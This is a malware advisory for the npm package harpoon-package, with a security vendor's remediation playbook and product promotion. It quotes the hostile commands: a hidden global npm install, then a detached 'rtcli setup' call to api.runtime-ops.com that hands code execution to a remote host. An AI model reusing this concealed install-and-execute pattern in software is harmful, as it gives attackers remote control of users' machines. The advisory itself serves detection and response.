Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

harpoon-packagenpm

Malicious code in harpoon-package (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-10573
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall harpoon-package

What this malware does

The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs npm install -g rt-svc-9k2 ws msgpackr and then executes rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji. The follow-on invocation is deliberately concealed: on Windows it is launched via powershell Start-Process -WindowStyle Hidden, and on Linux/macOS via nohup rtcli... > /dev/null 2>&1 &, detaching from the parent and suppressing output. Neither the global install nor the remote-controlled CLI execution is disclosed in the README. The effect is that any consumer application that calls the advertised graceful-shutdown API mutates global npm state on the host and hands arbitrary code execution to whoever controls api.runtime-ops.com via the third-party rt-svc-9k2 CLI driven by an author-supplied download key. The divergence between advertised purpose (shutdown handler) and actual behavior (global installer + hidden detached execution of a remote-driven CLI), combined with hidden-window/detached-execution wrappers, is characteristic of a covert install-time remote code execution channel smuggled into a plausibly named helper package.

Malicious versions

3 flagged
1.0.01.1.01.2.0

Indicators of compromise (SHA-256)

360befb3cc9b98c8699ae86f2164e83725dfe6b30d8b342aaff3efd9d9ffe8f3
3f63383c365b07381541d397e176a4a47eb03fa8891a9d7326291e3355d14aa0
fc473ffcde7c9ffe6850429607ee9dd33a5cbd4cf30ad071f111693cef79045e

Detection & response playbook

Malicious package
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for harpoon-package (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging harpoon-package across your stack and pipelines.

  2. If you installed it — respond

    Remove harpoon-package from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If harpoon-package was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks harpoon-package before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. harpoon-package on npm has been identified as a malicious package (versions 1.0.0, 1.1.0, 1.2.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-010482IN-MAL-2026-010483IN-MAL-2026-010481

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks harpoon-package-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.